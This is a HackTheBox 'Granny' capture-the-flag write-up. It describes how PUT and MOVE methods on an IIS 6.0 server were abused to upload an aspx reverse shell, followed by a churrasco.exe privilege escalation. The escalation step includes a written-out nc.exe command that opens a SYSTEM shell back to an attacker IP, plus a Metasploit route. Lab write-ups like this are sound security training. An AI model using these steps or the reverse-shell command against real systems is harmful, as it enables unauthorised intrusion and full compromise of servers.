HackTheBox Granny Writeup

Reconnaissance

Enumeration

Exploitation

Windows Privilege Escalation

Windows Privilege Escalation with Metasploit

________________________________________

Reconnaissance

Run the nmapAutomator.sh script to automate all of the process of recon/enumeration.

Enumeration

We can see there is only 1 port open port 80 running Microsoft IIS httpd 6.0, lets browse it

nothing look interesting, nmapautomator scan shows that HTTP PUT method is allowed, so lets check what type of file allowed to upload.Aspx file are not allowed but txt files are, if we see nmapautomator scan we can also use MOVE method. MOVE method also use for rename file not only for change location. Lets try to upload text file via “CadaverOur text file uploaded perfectly, now lets check change the extension txt to aspx Now we have confirmed that it execute aspx file on the web server. Lets generate aspx shellcode and get the reverse shell

Exploitation

Upload the file change the file extension, start the netcat listener and execute the shellcodeHere we got Reverse shell if we try to get access user directory we get denied.Since we have low priv lets go for Privilege escalation to get full access. To get system information run “systeminfo” command After googling and try some exploits we found “Token Kidnapping Local Privilege Escalation” we can find churrasco.exe in kali machine by using command “locate churrasco

Windows Privilege Escalation

upload churrasco.exe and nc.exe same way we upload our reverse shell and change the directory to “wwwroot” because that is the location of our uploaded files. To get reverse shell as System Privilege we have to run command “Churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 10.10.14.58 2345 -e cmd.exe"” in victim machine and start listner in attacker machine.We got the System Privilege, user flag is in “C:\Documents and Settings\Lakis\Desktop” and root flag is in “C:\Documents and Settings\Administrator\Desktop”

Windows Privilege Escalation with Metasploit

We can get Privilege Escalation with Metasploit also first generate meterpreter shellcode and upload same way we upload our reverse shell, now we can start our listener in metasploit using "exploit/multi/handler" after executing our exploit we get meterpreter shell. Since we don’t have full access we can use "post/multi/recon/local_exploit_suggester" for Privilege Escalation it will suggest us possible exploit that we can use to get full access as shown in the below image 

Leave a Reply

Your email address will not be published. Required fields are marked *